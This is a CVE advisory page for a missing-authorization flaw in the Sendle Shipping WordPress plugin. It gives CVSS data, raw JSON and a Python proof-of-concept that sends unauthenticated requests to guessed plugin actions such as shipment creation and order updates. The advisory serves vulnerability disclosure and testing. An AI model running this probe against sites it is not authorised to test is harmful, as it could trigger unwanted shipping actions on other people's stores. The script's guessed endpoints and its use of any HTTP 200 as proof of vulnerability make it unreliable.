Security Vulnerability Report
中文
CVE-2025-62976 CVSS 5.3 MEDIUM

CVE-2025-62976

Published: 2025-10-27 02:15:58
Last Modified: 2026-04-27 17:16:39

Description

Missing Authorization vulnerability in Joovii Sendle Shipping official-sendle-shipping-method allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Sendle Shipping: from n/a through <= 6.02.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

official-sendle-shipping-method <= 6.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62976 PoC - Missing Authorization in official-sendle-shipping-method # Target: WordPress site with vulnerable Sendle Shipping plugin (<= 6.02) def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-62976 """ # Common AJAX endpoint for WordPress plugins endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/sendle/v1/', ] # Potential vulnerable actions in Sendle Shipping plugin vulnerable_actions = [ 'sendle_create_shipment', 'sendle_update_order', 'sendle_sync_orders', 'sendle_generate_label', 'sendle_validate_address', ] for endpoint in endpoints: for action in vulnerable_actions: try: if 'admin-ajax.php' in endpoint: data = { 'action': action, 'order_id': '1', } response = requests.post(target_url + endpoint, data=data, timeout=10) else: response = requests.get(target_url + endpoint + action, timeout=10) # If response indicates successful execution without auth requirement if response.status_code == 200: print(f'[+] Potential vulnerable endpoint found: {endpoint} with action: {action}') print(f' Status: {response.status_code}') return True except requests.exceptions.RequestException as e: print(f'[-] Error testing {endpoint}: {e}') return False def main(): if len(sys.argv) < 2: print('Usage: python cve-2025-62976-poc.py <target_url>') print('Example: python cve-2025-62976-poc.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') print(f'[*] Scanning target: {target}') print(f'[*] CVE-2025-62976: Missing Authorization in official-sendle-shipping-method') if check_vulnerability(target): print('[+] Target appears to be vulnerable!') print('[+] Recommendation: Update official-sendle-shipping-method to latest version') else: print('[-] Target does not appear to be vulnerable') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62976", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:58.283", "lastModified": "2026-04-27T17:16:39.147", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Joovii Sendle Shipping official-sendle-shipping-method allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Sendle Shipping: from n/a through <= 6.02."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/official-sendle-shipping-method/vulnerability/wordpress-sendle-shipping-plugin-6-02-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}